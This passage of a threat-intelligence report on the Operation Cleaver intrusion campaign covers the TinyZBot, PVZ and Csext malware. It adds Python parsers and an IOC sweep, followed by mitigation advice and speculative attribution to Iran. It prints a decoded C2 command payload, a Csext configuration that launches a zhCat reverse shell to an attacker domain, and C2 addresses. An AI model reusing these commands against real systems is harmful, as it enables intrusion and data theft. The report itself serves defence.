  2129. that the file be deleted from the infected system.
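As an added example (not code from the report, and not TinyZBot's own), the following Python decodes a GetFile response like the one above, parses the command file it carries, and lists which request features of this exchange an HTTP request matches, as input to a detection rule. The sample response is constructed from the report's, with straight quotes and the defanged "tempuri(dot)org" restored so the XML parses.

```python
"""Decode a TinyZBot GetFile SOAP response and parse the command file in it.

Added example for the exchange above; not Cylance's analysis code and not
TinyZBot's own. The sample response is constructed from the one in the
report, with straight quotes and "tempuri(dot)org" restored to tempuri.org
so that the XML parses.
"""
import base64
import xml.etree.ElementTree as ET

TEMPURI = "http://tempuri.org/"  # service namespace TinyZBot uses (from the report)

# SOAP operations the report lists on the C2 endpoint (checkupdate.asmx).
TINYZBOT_SOAP_OPS = {"CheckFileMD5", "GetFile", "GetFileList",
                     "GetServerTime", "UploadFile"}

SAMPLE_GETFILE_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xmlns:xsd="http://www.w3.org/2001/XMLSchema">'
    '<soap:Body><GetFileResponse xmlns="http://tempuri.org/"><GetFileResult>'
    'OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgP'
    'j4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KV'
    'VBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMR'
    'VRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA=='
    '</GetFileResult></GetFileResponse></soap:Body></soap:Envelope>'
)


def extract_getfile_payload(soap_xml):
    """Return the raw command file carried Base64-encoded in a GetFileResponse."""
    data = soap_xml.encode("utf-8") if isinstance(soap_xml, str) else soap_xml
    root = ET.fromstring(data)
    result = root.find(".//{%s}GetFileResult" % TEMPURI)
    if result is None or not result.text:
        raise ValueError("no GetFileResult in SOAP body")
    # The server may line-wrap the Base64 text; strip all whitespace first.
    return base64.b64decode("".join(result.text.split()))


def parse_command_file(data):
    """Parse KEY=value lines into (KEY, value) pairs.

    Lines starting with ';' (the timestamp line) are skipped, as the report
    says the TinyZBot parser ignores them. Lines without '=' are skipped too.
    """
    commands = []
    for raw in data.decode("utf-8", "replace").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            commands.append((key.strip().upper(), value))
    return commands


def split_runcmd(value):
    """RUNCMD values are '<executable>,<arguments>' in the report's example."""
    exe, _, args = value.partition(",")
    return exe.strip(), args.strip()


def soap_c2_indicators(method, path, headers):
    """List which features of the C2 request above an HTTP request matches.

    Each feature alone is weak (tempuri.org is the default namespace in many
    SOAP samples, and the User-Agent is the stock .NET 2.0 web-service
    client), so a rule should require the SOAPAction match plus another.
    """
    h = {k.lower(): v for k, v in headers.items()}
    hits = []
    action = h.get("soapaction", "").strip().strip('"')
    if action.startswith(TEMPURI) and action[len(TEMPURI):] in TINYZBOT_SOAP_OPS:
        hits.append("soapaction:" + action[len(TEMPURI):])
    if method.upper() == "POST" and path.lower().endswith(".asmx"):
        hits.append("post-asmx")
    if "MS Web Services Client Protocol" in h.get("user-agent", ""):
        hits.append("dotnet-ws-client-ua")
    return hits


if __name__ == "__main__":
    payload = extract_getfile_payload(SAMPLE_GETFILE_RESPONSE)
    for key, value in parse_command_file(payload):
        print(key, "->", value)
```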
  2130.  
  2131. The following is a list of supported commands that TinyZBot responds to:
  2132.  
  2133. COPY REPLACE DELETE UPLOAD FUPLOAD CLEARFILES
  2134. CLEAROUPUTFOLDER SAVECONFIG SAVETOCFGFILE RESTART
  2135. RestartForce KILL DEEPKILL EXIT EXITFORCE
  2136. RUNAVDETECTOR RUNWAIT RUNCMD UCMD GETINFO
  2137. GETSCREENSHOTHQ GETSCREENSHOT CREATEUPLOADLIST FORCERESTART
  2138. FORCEEXIT UNLOADMODULE RELOADMODULE LOADMODULE UNLOADM
  2139. RELOADM REMOVEM UNLOADALL RELOADALL ADDSEC
  2140. REMSEC ADDKV CHGKV REMKV ADDK REMOVEK
  2141.  
  2142.  
2143. Commands such as GETINFO are often run on newly infected systems, as their output lets the operators decide
2144. whether the infection has hit the correct target. There are additional SOAP commands, but they will not be covered in
  2145. detail. The following is a list of all the SOAP commands: CheckFileMD5, GetFile, GetFileList,
  2146. GetServerTime, UploadFile.
  2147.  
  2148. Deception
  2149.  
  2150. TinyZBot is commonly installed using some form of deception. Recent versions use the resume-based
  2151. methods reported in the Initial Compromise sections. An additional method was used for earlier
  2152. versions. When early versions of TinyZBot were executed, they opened an image stored in the resource
  2153. section of the executable and copied the malicious TinyZBot executable to the
  2154. %AppData% directory.
  2155.  
  2156. Many of the images identified were of the popular Lebanese singer and actress Haifa Wehbe. The
  2157. backdoor additionally replaced the original malicious executable with an appropriately named image
  2158. file and padded the image file with null bytes in order to mirror the original file size.
  2159.  
  2165.  
  2166. History
  2167.  
2168. The earliest known version of TinyZBot was compiled on January 27, 2013. This early version had very
2169. little functionality. It was limited to logging keystroke data, sending emails, and creating a link
2170. in the user’s startup folder for persistence. Its method of exfiltrating the logged keystrokes relied
2171. upon a hardcoded email address stored in the binary. The sender email address was
2172. dyanachear(at)beyondsys.com and emails were destined for testmail_00001(at)yahoo.com. The message
2173. was intended to look like common Viagra spam from China, but would be sent with the keystroke
2174. logging data as attachments, as well as system information. The initial version did not provide any
2175. means of receiving commands and was obfuscated with SmartAssembly. The following iteration, compiled
2176. on March 12, 2013, only contained minor bug fixes.
  2177.  
  2178. The next version was compiled on April 24, 2013. This version starts to look more like an average bot.
  2179. A command and control protocol was established, using HTTP and SOAP for the protocol. The command and
2180. control server for this version was located at 173.192.144.68/DefaultWS(dot)asmx. This new command and
  2181. control protocol allowed for the addition of quite a few other features. An update mechanism was added,
  2182. and could be regularly scheduled, so unassisted periodic update checks were automatically performed. The
  2183. SOAP API used a dynamic password mechanism, which required the computation of a simple key in order to
  2184. access certain parts of the API. The email data exfiltration method also underwent modification to be
2185. activated at a scheduled interval. There were also some changes which looked to be bug fixes, such as
  2186. limiting the number of times sending an email could fail.
  2187.  
  2188. The next day, April 25, 2013, a new version was compiled which allowed for self-deletion.
  2189.  
  2190. On May 14, 2013, we noticed a change which assisted in the identification of active targets. The AppUsageId
  2191. (at this point named AppType) was an identifier used by this organization in order to differentiate
  2192. between targets infected with TinyZBot, meaning they could effectively run multiple campaigns using
  2193. the same command and control server and know which target was infected. This also allowed for separate
  2194. commands to be supplied to different targets without the need for per-bot commands. At this time, the
2195. AppUsageId was total0, but later we observed names which aligned with active targets. The exfiltration
  2196. email address was also changed to TerafficAnalyzer(at)yahoo.com.
  2197.  
  2198. On June 17, 2013, there was an addition that allowed for the loading of configuration data from the
  2199. PE’s resources. At this time, it was limited to the exfiltration email address. This version was not
2200. obfuscated with SmartAssembly.
  2201.  
  2210. We do not see a new version of TinyZBot until June 7, 2014. There are quite a few notable improvements,
2211. but nowhere near enough to indicate consistent development on the project for a year. SmartAssembly
2212. was used again. A method was added to detect what security related software is installed. Avira
  2213. antivirus was specifically targeted and disabled, due to its detection of the new keystroke logger
  2214. module added in this version. This keystroke logger source is publicly available and referred to as
  2215. DeadkeyLogger.
  2216.  
2217. A new string encryption class was added, but its code was copied and pasted from a Microsoft example.
2218. The ability to extract Internet Explorer passwords was added. Clipboard monitoring code was added,
2219. but not invoked. The emailing features were removed, although the classes which previously contained
2220. them remained present, now empty. Many more options could now be loaded from PE resources. The
2221. ability to add PE resources was added. Another version was compiled on June 7, 2014, with no feature
2222. difference.
  2223.  
  2224. On June 17, 2014, we see the first instance of Binder_1, which is aptly named, as it is a binder.
  2225. The legitimate application used in this version of Binder_1 was compiled on August 22, 2013, and is
  2226. a self-extracting archive of desktop wallpapers, including an image from the game Mirror’s Edge. The
  2227. TinyZBot included was the version compiled on June 7, 2014.
  2228.  
  2229. The version compiled on June 23, 2014, added functionality which allowed screenshots of the desktop
  2230. to be taken.
  2231.  
  2232. On August 2, 2014, we see another version without SmartAssembly obfuscation. A bug fix is made to the
  2233. keystroke logging method, and clipboard monitoring is enabled.
  2234.  
  2235. Three items were compiled on August 18, 2014. Two of them are TinyZBot binaries, which contain a minor
  2236. key logging bug fix. The third is a new Binder_1 instance, which contains one of the TinyZBot instances
2237. compiled that day. The legitimate application included in this binder is called Easy_resume_creator and
2238. is the application EasyRésuméCreatorPro. This version targeted a major Saudi Arabian oil
  2239. company.
  2240.  
  2241. From August 23 to August 26, 2014, new versions of TinyZBot were compiled with the AppUsageIds targeting
  2242. major oil and gas companies in Qatar and Kuwait, Ministries of Foreign Affairs in the Persian Gulf,
  2243. and a major airline holding company in UAE. These versions of TinyZBot moved towards a more modular
  2244. architecture where each component was in its own .NET assembly. This was presumably done to limit
  2245. antivirus detection of each individual file as well as allow for dynamic updating of specific modules.
  2246. All of these were included in their own Binder_1 instance, which also dropped Easy_resume_creator.
  2247.  
  2256. There also seem to be improved software engineering practices in many locations. FTP upload support
  2257. was added, with hardcoded credentials of ano:1. This FTP upload functionality points to the command
  2258. and control server, and is invoked by a command in the SOAP command and control channel. These
  2259. versions have the capability to install as a service.
  2260.  
  2261. On August 25, 2014, the version compiled on August 18 was submitted to VirusTotal in a ZIP archive
2262. located at http://dl.doosan-job(dot)com/cv/Easy_Resume_Creator-v2.0.zip. This indicates that TinyZBot
  2263. is not only being installed while impersonating a résumé creation suite, but is also impersonating
  2264. potential employers when distributed.
  2265.  
  2266. On September 9, 2014, a ZIP file containing TinyZBot and a configuration targeting a major US
  2267. university with its AppUsageId was created. This was discovered on an anonymous FTP server in the
  2268. same IP range as dl.doosan-job(dot)com along with other malware.
  2269.  
  2270. From September 11 through September 17, 2014, some TinyZBot components were compiled, along with a
  2271. new dropper. This dropper impersonated a tool to submit a résumé to Teledyne. When executed, the
  2272. user is prompted to enter personal information, and at the end is given a button to submit the
  2273. résumé to Teledyne, although nothing is actually submitted. While the user enters this information,
  2274. their machine is infected with TinyZBot. The AppUsageIds for these versions target a major US-based
  2275. university as well as an Israeli aerospace company. These versions began to include a new method of
  2276. installing as a service. The service runs with the name Network Connectivity Manager.
  2277.  
  2278.  
  2279. Interesting Notes
  2280.  
  2281. TinyZBot, as well as some other tools (Csext, Net Crawler) initially would not run without a command
  2282. line parameter set. This was likely to avoid detonation-based detection engines. This command line
2283. parameter was opensesemi, which is often stored in the application’s code in an obfuscated manner.
  2284. The binders and droppers for TinyZBot provided this command line argument and others when executing.
  2285.  
  2286. TinyZBot uses a dynamic mutex. This was accomplished by combining a static preset prefix with the
  2287. active process ID. This allowed supplemental tools to keep TinyZBot running by enumerating every
  2288. process and checking if the process ID and mutex prefix existed. If no mutex and process pair was
  2289. located, another TinyZBot instance would be started.
  2290.  
  2296.  
  2297. Command and Control Servers
  2298.  
  2299. *       88.150.214.168, United Kingdom, microsoftactiveservices(dot)com
  2300. *       95.211.241.249, Amsterdam, Noord-Holland, Netherlands
  2301. *       88.150.214.166, United Kingdom
  2302. *       173.192.144.68, Seattle, Washington, USA
  2303. *       188.227.180.213, United Kingdom
  2304. *       192.111.145.197, Rochester, New York, USA
  2305.  
  2306.  
  2307. Backdoors
  2308.  
2309. Multiple backdoors were used by this organization. These are scripts or applications that allowed
2310. for command or code execution from outside of the victim network. Many of their backdoors were web
  2311. applications, added to web servers, so commands can be executed from a browser or client able to
  2312. communicate with them. This group includes the results of the Shell Creator mentioned in the
  2313. Attribution section, as well as ASPX backdoors used by Nesha. A PHP shell was also observed,
  2314. which also included attribution to Nesha in its hashed password.
  2315.  
  2316. An ASPX backdoor named Zh0uSh311 was located on live servers as well as recovered from a staging
  2317. server. This backdoor does not require authentication, and its use appears to be straightforward.
  2318. Its functionality breaks down into three fairly standard components: SQL queries, executing commands,
  2319. and uploading files.
  2320.  
  2321.  
  2323.  
  2324. Figure 24: The ASPX backdoor named “Zh0uSh3ll”, allowing SQL queries.
  2325.  
  2335. Figure 25: The ASPX backdoor named “Zh0uSh3ll”, allowing file
  2336.  
  2337. This organization utilized backdoors which masqueraded as varying versions of Notepad. They replace
  2338. the existing Notepad.exe on the infected machine, and when run they call out to a remote server
  2339. and execute any shell code returned by the remote server. There will be a detailed analysis of these
  2340. backdoors posted to Cylance’s blog in the future.
  2341.  
  2342.  
  2343. PVZ
  2344.  
  2345. PVZ is a name for a set of executables used together to create a botnet. The name PVZ was assigned
  2346. by us as this is one of the few tools this organization has not named themselves.
  2347.  
  2356. The components are as follows:
  2357.  
  2358. *       PVZ-In
  2359. *       PVZ-Out
  2360. *       Syn Flooder
  2361. *       LoggerModule
  2362. *       XYNTService
  2363. *       Jasus
  2364.  
  2365. XYNTService was not developed by the Cleaver team, but instead is a publicly available project which
  2366. executes an executable as a service.
  2367.  
  2368.  
  2369. PVZ-In
  2370.  
  2371. The purpose of PVZ-In is to communicate with a command and control server. Communication is primarily
  2372. unidirectional, as little information is provided from the bot to its command and control server. The
2373. known command and control server is located at http://kundenpflege.menrad(dot)de/js/jquery/default.aspx
2374. and the command and control protocol only uses
  2375. HTTP. The commands as well as infected computer information are transferred in the Content-Disposition
  2376. HTTP header, making the traffic easy to pass over as benign.
  2377.  
  2378.  
  2379. When a command is received from the server, the results are stored in a central location on disk that
  2380. the PVZ tools utilize. Command functionality is limited to executing supplied commands, downloading
  2381. and executing executables as well as self-updating.
  2382.  
  2383. The debug file path for PVZ-In is:
  2384.  
  2385.  
  2386. C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\
  2387. Release\BotManager.pdb
  2388.  
  2389. PVZ-In has been observed using the file name ossisvc.exe.
  2390.  
  2391.  
  2392. PVZ-Out
  2393.  
  2394. PVZ-Out is the other half of the command and control channel, primarily uploading results of commands
  2395. and keystroke logging data to a remote server. The known command and control server for PVZ-Out is
  2396. located at http://www.gesunddurchsjahr(dot)de/tor/default.aspx. Much like PVZ-In, this command and
  2397. control channel communicates with the Content-Disposition HTTP header, but for file data, POST
  2398. data is supplied.
  2399.  
  2407. Data uploaded is often compressed, which can make it more difficult to detect the exfiltration of
  2408. sensitive information.
  2409.  
  2410. The debug file path for PVZ-Out is:
  2411.  
  2412.  
2413. C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\Release\SendModule.pdb
  2414.  
  2415. PVZ-Out has been observed with the file name osppsvc.exe.
  2416.  
  2417.  
  2418. SYN Flooder
  2419.  
2420. SYN Flooder is a simple network-based denial of service tool. It is a command line utility capable of
  2421. being invoked by PVZ-In. Targeting information is supplied via command line parameters.
  2422. The debug file path for SYN Flooder is:
  2423.  
  2424.  
2425. C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\Release\socket-test.pdb
  2426.  
  2427. SYN Flooder has been observed using the name ossysvc.exe.
  2428.  
  2429.  
  2430. Logger Module
  2431.  
  2432. Logger Module observes the user’s actions and records them to a file. The recorded actions include
  2433. mouse clicks, active windows, keypresses, as well as clipboard data. The resulting log is written
  2434. out to a location where PVZ-Out can exfiltrate it to its command and control server. Logger Module
  2435. has been observed using the name ospcsvc.exe.
  2436.  
  2437. The following command and control servers for Logger Module have been observed:
  2438.  
  2439.  
  2440. 212.87.154.14, Baden-Wurttemberg, Germany, kundenpflege.menrad(dot)de
  2441. 212.87.154.12, Baden-Wurttemberg, Germany, www.gesunddurchsjahr(dot)de
  2442.  
  2443. wndTest
  2444.  
2445. WndTest is the evolution of the PVZ tool chain into a single executable. The tool chain is minimized
2446. down to command and control communications, keystroke logging, and clipboard monitoring. The
  2447. command and control still supports upgrading, downloading, and executing of applications, as well
  2448. as executing batch scripts. WndTest installs as a service and has been observed attempting to
  2449. impersonate Adobe Report Service. WndTest starts using PHP servers for its command and control server,
  2450. some of which are listed as defaced sites.
  2451.  
  2459. We have seen wndTest communicate with the following servers:
  2460.  
  2461.  
  2462. *       209.208.97.44, Orlando, Florida, USA, www.lat(dot)am
  2463. *       23.238.17.181, Tulsa, Oklahoma, USA, regulatorfix(dot)com
  2464. *       209.208.97.44, Orlando, Florida, USA, www.asiess(dot)com
  2465. *       198.50.100.210, Quebec, Canada, halon(dot)com.br
  2466. *       207.182.142.68, Columbus, Ohio, USA
  2467. *       95.211.191.247, Amsterdam, Noord-Holland, Netherlands
  2468.  
  2469.  
  2470. Csext
  2471.  
  2472. Csext is a backdoor application developed in C# which runs as a service. Its primary functionality
  2473. is based on commands supplied by its configuration file. The configuration file is able to store
  2474. specific commands, which are intended to run at particular times. A recovered configuration is as
  2475. follows:
  2476.  
  2477.  
  2478. domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3
  2479. %%
2480. {0}\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\windows\system32\cmd.exe
2481. ,taskkill.exe$$/F /PID {pid},00:29,00:35
  2482. %%
  2483. ##
  2484.  
  2485. This configuration executes zhCat to connect back to srv01.microsoftwindowsupdate(dot)net
  2486. (a deceptive domain owned by this group with falsified Whois data attributing to Microsoft Investor
  2487. Relations) with XORed communication using the HTTP protocol on TCP port 443. This zhCat instance is
2488. running cmd.exe, effectively making it a reverse connecting shell. This command runs at 00:29 in the
  2489. morning, and is killed by taskkill at 00:35. This gives the attackers a predictable method to regain
  2490. access to a compromised network if they ever lose access.
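As an added example (not Cylance's code and not Csext's), the following Python parses the recovered configuration above into its named values and scheduled jobs so an analyst can read off the start command, the kill command and the window between them. The field layout is an assumption read from this one config and the report's reading of it: "name=v1,v2,..." lines before the first "%%" are named values, "%%" opens and closes a job whose comma-separated fields are start command, kill command, start time and kill time, a command is "<exe>$$<args>", and "##" ends the file.

```python
"""Parse the Csext configuration format recovered above.

Added example; not Cylance's code and not Csext's. The field layout is an
assumption read from the one recovered config and the report's reading of it:
'name=v1,v2,...' lines before the first '%%' are named values, '%%' opens and
closes a job whose comma-separated fields are <start command>, <kill command>,
<start time>, <kill time>, a command is '<exe>$$<args>', and '##' ends the file.
"""
import re
from dataclasses import dataclass, field

# Constructed from the recovered configuration shown in the report (the
# wrapped command line rejoined; "(dot)" defanging kept as printed).
SAMPLE_CSEXT_CONFIG = (
    "domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3\n"
    "%%\n"
    "{0}\\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\\windows\\system32\\cmd.exe "
    ",taskkill.exe$$/F /PID {pid},00:29,00:35\n"
    "%%\n"
    "##\n"
)


@dataclass
class Job:
    start: tuple        # (executable, argument string) run at start_at
    kill: tuple         # (executable, argument string) run at kill_at
    start_at: str       # "HH:MM"
    kill_at: str


@dataclass
class CsextConfig:
    values: dict = field(default_factory=dict)   # name -> list of fields
    jobs: list = field(default_factory=list)


def _split_command(text):
    exe, _, args = text.partition("$$")
    return exe.strip(), args.strip()


def _parse_job(body):
    fields = [f.strip() for f in body.split(",")]
    if len(fields) != 4:
        raise ValueError("expected start,kill,start_time,kill_time; got %r" % body)
    for t in fields[2:]:
        if not re.fullmatch(r"\d{2}:\d{2}", t):
            raise ValueError("bad time field %r" % t)
    return Job(_split_command(fields[0]), _split_command(fields[1]), fields[2], fields[3])


def parse_csext_config(text):
    cfg = CsextConfig()
    in_job, job_lines = False, []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "##":          # end-of-config marker
            break
        if line == "%%":          # job delimiter: toggles in/out of a job block
            if in_job:
                cfg.jobs.append(_parse_job(" ".join(job_lines)))
                job_lines = []
            in_job = not in_job
            continue
        if in_job:
            job_lines.append(line)
        elif "=" in line:
            name, _, rest = line.partition("=")
            cfg.values[name.strip()] = [f.strip() for f in rest.split(",")]
    if in_job:
        raise ValueError("unterminated job block")
    return cfg


def expand_placeholders(template, values):
    """Fill {name} from the config's named values (first field); leave the rest.

    {0}, {zhname} and {pid} are filled by Csext at run time (an assumption:
    the report does not say where they come from), so they stay as written.
    """
    def repl(m):
        name = m.group(1)
        return values[name][0] if name in values else m.group(0)
    return re.sub(r"\{(\w+)\}", repl, template)


def active_minutes(job):
    """Minutes from the start time to the kill time, across midnight if needed."""
    def to_min(hhmm):
        h, m = hhmm.split(":")
        return int(h) * 60 + int(m)
    return (to_min(job.kill_at) - to_min(job.start_at)) % (24 * 60)


if __name__ == "__main__":
    cfg = parse_csext_config(SAMPLE_CSEXT_CONFIG)
    for job in cfg.jobs:
        print(job.start_at, job.start[0], expand_placeholders(job.start[1], cfg.values))
        print(job.kill_at, job.kill[0], job.kill[1], "(%d min window)" % active_minutes(job))
```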
  2491.  
  2492. Csext also has email functionality similar to TinyZBot. This email functionality is used to
  2493. exfiltrate the results of commands from the command file which can also include requests like
  2494. gathering user information.
  2495.  
  2496. We have seen Csext configured to communicate with the following servers:
  2497.  
  2498.  
  2499. *       78.47.102.90, Germany, srv01.microsoftwindowsupdate(dot)net
2500. *       174.36.195.158, Washington, D.C., USA, srv01.microsoftupdateserver(dot)net
  2501.  
  2502.  
  2508.  
  2509. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  2510. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
[ Title-page art: MITIGATION ]
  2570.  
  2571. [ PG-60 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2572.  
  2573.  
  2574.  
  2575. [CYLANCE                                                                                  #OPCLEAVER]
  2576.  
  2577.  
  2578. MITIGATION
  2579.  
If, after reviewing the Indicators of Compromise (IOCs) listed in Appendix A, you believe your
organization to be a victim of Operation Cleaver, we recommend you consider the following course
of action:
  2583.  
  2584. 1.      If inside the United States, contact the Federal Bureau of Investigation (FBI)
  2585. via either your local FBI team or FBI CYWATCH at 1-855-292-3937 or cywatch@ic.fbi.gov.
  2586.  
  2587. 2.      If outside the United States, contact your local, district, state or federal law
  2588. enforcement authorities.
  2589.  
3.      If you have visibility into the attacks on your company and the tools and expertise to track
them down, use the IOCs in Appendix A to identify the attackers' presence in your network, contain
them so the compromise cannot expand, and remove their access immediately.
  2593.  
  2594. 4.      If you do NOT have visibility into the attacks, need help identifying an existing successful
  2595. compromise in your organization, or more importantly wish to prevent this attack or attacks similar
  2596. to Operation Cleaver, please contact your security provider.
  2597.  
  2598. 5.      If you wish to contact Cylance for additional details not available in this report, please email
  2599. opcleaver@cylance.com.
  2600.  
  2601.  
  2602. 6.      If you would like to learn more about Cylance products and professional services, or discuss
  2603. how Cylance can mitigate Operation Cleaver’s impact to your organization, please contact us directly.
  2604.  
  2605.  
  2606.  
  2607. +1 (877) 973 - 3336
  2608.  
  2609.  
  2610. opcleaver@cylance.com
  2611.  
  2612.  
  2613. www.cylance.com
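Step 3 above is the technical step: sweep your own telemetry for the appendix's indicators before containing and evicting the intruders. The following is an added example of such a sweep, not code from the report or from Cylance. It matches hash, domain, IP and CIDR indicators against proxy, DNS and firewall log lines and against file contents. Every indicator value, log line and file path in it is a constructed placeholder (documentation-only TEST-NET addresses, a reserved .invalid domain, a hash of a made-up byte string), not one of Appendix A's real IOCs; in a real sweep you would load the appendix's lists in their place.

```python
"""Sweep local telemetry for a list of IOCs: file hashes, domains, IPs and address blocks."""
import hashlib
import ipaddress
import re
from collections import defaultdict

# Constructed placeholder indicators (NOT from Appendix A of the report).
IOCS = {
    "sha256": {hashlib.sha256(b"constructed-dropper-sample").hexdigest()},
    "md5": set(),
    "domain": {"c2.example.invalid"},
    "ip": {"198.51.100.7"},        # TEST-NET-2, documentation address
    "cidr": {"203.0.113.0/24"},    # TEST-NET-3, stands in for an attacker-controlled block
}

IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def compile_iocs(iocs):
    """Normalise the indicator sets once: lowercase hashes/domains, parse addresses and blocks."""
    return {
        "sha256": {h.lower() for h in iocs.get("sha256", ())},
        "md5": {h.lower() for h in iocs.get("md5", ())},
        "domain": {d.lower().rstrip(".") for d in iocs.get("domain", ())},
        "ip": {ipaddress.ip_address(a) for a in iocs.get("ip", ())},
        "cidr": [ipaddress.ip_network(c, strict=False) for c in iocs.get("cidr", ())],
    }


def domain_hits(host, compiled):
    """A host matches if it equals a listed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return [d for d in compiled["domain"] if host == d or host.endswith("." + d)]


def ip_hits(addr_text, compiled):
    """An address matches if it is listed exactly or falls inside a listed block."""
    try:
        addr = ipaddress.ip_address(addr_text)
    except ValueError:
        return []
    hits = [str(addr)] if addr in compiled["ip"] else []
    hits += [str(net) for net in compiled["cidr"] if addr in net]
    return hits


def scan_log_line(line, compiled):
    """Return (indicator_type, indicator) pairs found in one log line."""
    found = []
    for host in set(DOMAIN_RE.findall(line)):
        found += [("domain", d) for d in domain_hits(host, compiled)]
    for ip in set(IP_RE.findall(line)):
        found += [("ip", i) for i in ip_hits(ip, compiled)]
    return found


def scan_file_bytes(data, compiled):
    """Hash file contents and compare against the hash indicators."""
    found = []
    sha = hashlib.sha256(data).hexdigest()
    md5 = hashlib.md5(data).hexdigest()
    if sha in compiled["sha256"]:
        found.append(("sha256", sha))
    if md5 in compiled["md5"]:
        found.append(("md5", md5))
    return found


def sweep(log_lines, files, iocs=IOCS):
    """Run both checks; returns {source: [(type, indicator), ...]} for sources with hits only."""
    compiled = compile_iocs(iocs)
    report = defaultdict(list)
    for n, line in enumerate(log_lines, 1):
        for hit in scan_log_line(line, compiled):
            report[f"log:{n}"].append(hit)
    for name, data in files.items():
        for hit in scan_file_bytes(data, compiled):
            report[f"file:{name}"].append(hit)
    return dict(report)


# Constructed sample telemetry: one proxy line, one DNS line, two firewall lines, two files.
SAMPLE_LOGS = [
    "2014-11-30T02:14:07Z proxy src=10.0.5.23 host=update.c2.example.invalid method=POST bytes=4212",
    "2014-11-30T02:14:09Z dns   client=10.0.5.23 query=intranet.corp.local answer=10.0.1.4",
    "2014-11-30T02:15:41Z fw    src=10.0.5.23 dst=203.0.113.44 dport=443 action=allow",
    "2014-11-30T02:16:02Z fw    src=10.0.5.9  dst=198.51.100.7 dport=80 action=allow",
]
SAMPLE_FILES = {
    "C:\\Windows\\Temp\\svchost_.exe": b"constructed-dropper-sample",
    "C:\\Users\\ops\\report.docx": b"benign document contents",
}

if __name__ == "__main__":
    for source, hits in sweep(SAMPLE_LOGS, SAMPLE_FILES).items():
        print(source, hits)
```

Domain matching deliberately includes subdomains, and address matching includes whole blocks, because the report describes the operators spinning large IP ranges up and down rather than reusing single hosts; exact hashes catch only the samples in the appendix, so a repacked dropper will not trip the hash check and still needs the network indicators. Treat each hit as a lead for the containment and eviction work in step 3, not as proof on its own.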
  2614.  
  2615.  
  2616. [ PG-61 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2617.  
  2618.  
  2619.  
[ Title-page art: SPECULATION ]
  2683.  
  2684. [ PG-62 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2685.  
  2686.  
  2687.  
  2691. SPECULATION: THE WHY
  2692.  
Iran in 2014 can probably be best described as galvanizing. It has long been an “enemy” of
the West, and of the United States in particular, but today’s headlines cover a variety of topics,
from nuclear talks to human rights to terrorism to cyber hacking. Iran continues to be extremely
active on the global stage, and thereby on the radar of every superpower [10].
  2697.  
  2698. Iran’s cyber sophistication has grown rapidly since the dawn of Stuxnet and they have used hard
  2699. dollars combined with national pride to help build their cyber army. Few doubt their commitment as
  2700. a government and nation state to funding and recruiting cyber warriors to infiltrate and damage their
  2701. enemies. And it has been commonly postulated that almost all activity since 2010 coming out of Iran
  2702. is associated with retaliation for Stuxnet/Duqu/Flame, which seems natural given the severity of the
  2703. impact. But they don’t need Stuxnet as motivation to want to hack the world. They have long desired
  2704. power on the political stage, in particular in the fight for nuclear power autonomy.
  2705.  
With the deadlines around the Iranian nuclear discussions pushed to 2015, the attacks may be tied to
negotiating power when discussing a pact with the nuclear superpowers of the United States, Britain,
France, Germany, Russia and China.
  2709.  
The inner workings of the Iranian government remain largely a mystery to the western world. However,
Iran’s control over its people and the private businesses born inside it has been well reported.
A 2013 Reuters investigation details how the secretive Iranian organization called
“Setad Ejraiye Farmane Hazrate Emam” has become one of the most powerful organizations in the country,
capable of taking over properties and businesses and buying controlling interests in numerous sectors
including finance, oil and telecommunications, with holdings totaling upwards of $95B [11]. Even the US
Treasury has documented an extensive network of front companies in its report on the Execution of Imam
Khomeini’s Order (EIKO), which through its two main subsidiaries controls 37 private businesses that
are purely front companies for the Iranian government [12].
  2719.  
Iran’s history of controlling Internet usage and the very Internet on-ramps into the country is
well known [13, 14]. It has controlled much of the country’s Internet access to date and has taken
controlling interests in the companies that provide it in order to carry out its work. Operation
Cleaver’s frequent spin-up and take-down of large IP blocks inside the AFRANET IP space in Iran,
together with Iran’s well-recorded investment in cyber warfare [14], lead us to one simple conclusion:
Iran is extremely active in the world of hacking.
  2726.  
  2727. [ PG-63 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2728.  
  2729.  
  2730.  
  2734. Speculation: The Why (cont.)
  2735.  
  2736. Involvement with North Korea
  2737.  
Operation Cleaver’s intense focus on critical infrastructure companies, especially in South Korea,
hints at information sharing or joint operations with Iran’s partner, North Korea. In September 2012,
